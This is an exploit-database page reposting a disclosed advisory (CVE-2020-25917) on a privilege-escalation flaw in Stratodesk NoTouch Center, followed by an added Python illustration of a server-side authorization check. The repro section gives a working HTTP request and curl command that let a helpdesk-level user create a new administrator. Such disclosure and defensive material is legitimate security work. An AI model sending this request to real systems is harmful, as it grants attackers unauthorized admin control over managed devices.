0day.today - Biggest Exploit Database in the World.
Stratodesk NoTouch Center Privilege Escalation Vulnerability
Risk: Security Risk High
Stratodesk NoTouch Center Virtual Appliance is a portal for managing NoTouch clients. It appears that Stratodesk has a partnership with ViewSonic and produced these appliances to support some of their hardware devices as well.

- https://www.stratodesk.com/products/notouch-desktop/virtual-appliance/
- https://www.viewsonic.com/eu/products/desktop-virtualization/SC-T25.php

=Authenticated privilege escalation from low privileged user to admin=

The user management security strategy seems to be just hiding the options in the Web UI from unprivileged users, but they can still call admin-related functions manually. Many different admin requests are available to be called by non-admin users, with the root cause being the same. The add user functionality is just the biggest impact demonstration of this issue.

A low privileged user on the platform, for example a user with “helpdesk” privileges (which is level 4 in their system of 1-4 privilege levels with 1=admin), can perform privileged operations including adding a new administrator to the platform.

Repro

1) Create a low privileged user
2) Login as such user and capture this user’s JSESSIONID in the Cookie header
3) Insert your ID in the below request where the JSESSIONID data is
4) Login as admin2 and see that you now have admin privileges

    POST /easyadmin/user/submitCreateTCUser.do HTTP/1.1
    Host: stratodesk-server
    Content-Type: application/x-www-form-urlencoded
    Content-Length: XX
    Cookie: JSESSIONID=[XXXXXXXX...]

    func=save&userid=0&name=admin2&fullname=admin2&password=Secret2&seclevel=1

"As cURL command"

    curl -i -s -k -X $'POST' \
        -H $'Host: stratodesk-server' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: XX' -H $'Cookie: JSESSIONID=XXXXXXXX...' \
        -b $'JSESSIONID=XXXXXXXX...' \
        --data-binary $'func=save&userid=0&name=admin2&fullname=admin22&password=Secret222&seclevel=1' \
        $'https://stratodesk-server/easyadmin/user/submitCreateTCUser.do'

Remediation

Fixed in NoTouch package v4.4.68 (unclear which if any OVA releases contain the updated packages)

CVE-2020-25917

Discovered and disclosed by Jeremy Brown / December 2020

# 0day.today [2024-11-15] #
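The root cause named in the advisory (admin options hidden in the Web UI but not enforced on the server) beside a deny-by-default server-side check, as an added example that is not part of the original advisory and is not Stratodesk code. Only the create-user path, the `seclevel` parameter and the 1-4 level model come from the advisory; every function, class and session name, and the second path, are hypothetical.

```python
# Added illustration; every name here is hypothetical, not Stratodesk code.
from dataclasses import dataclass

ADMIN, HELPDESK = 1, 4   # advisory's model: levels 1-4, 1 = admin, 4 = helpdesk

# Least-privileged level (largest number) allowed to call each action.
# Only the first path comes from the advisory; the second is constructed.
REQUIRED_LEVEL = {
    "/easyadmin/user/submitCreateTCUser.do": ADMIN,
    "/easyadmin/example/viewStatus.do": HELPDESK,
}

@dataclass
class Session:
    user: str
    seclevel: int  # set by the server at login, never read from the request

def ui_only_check(session, path, form):
    """Flawed pattern from the advisory: any logged-in session may call anything."""
    return session is not None

def server_side_check(session, path, form):
    """Deny by default; compare the session's level to the action's requirement."""
    if session is None:
        return False
    required = REQUIRED_LEVEL.get(path)
    if required is None:              # unmapped action: refuse
        return False
    if session.seclevel > required:   # larger number = less privilege
        return False
    # Never let a caller grant a level more privileged than their own.
    requested = form.get("seclevel")
    if requested is not None:
        if not requested.isdecimal() or not ADMIN <= int(requested) <= HELPDESK:
            return False
        if int(requested) < session.seclevel:
            return False
    return True

def decide(check, session, path, form):
    return 200 if check(session, path, form) else 403

CREATE = "/easyadmin/user/submitCreateTCUser.do"
FORM = {"func": "save", "userid": "0", "name": "admin2", "seclevel": "1"}  # constructed
if __name__ == "__main__":
    helpdesk = Session("helpdesk1", HELPDESK)
    print("ui-only:", decide(ui_only_check, helpdesk, CREATE, FORM))
    print("server-side:", decide(server_side_check, helpdesk, CREATE, FORM))
```

The same table-driven check applies to the other admin requests the advisory says share this root cause: each needs an entry, and anything without one is refused.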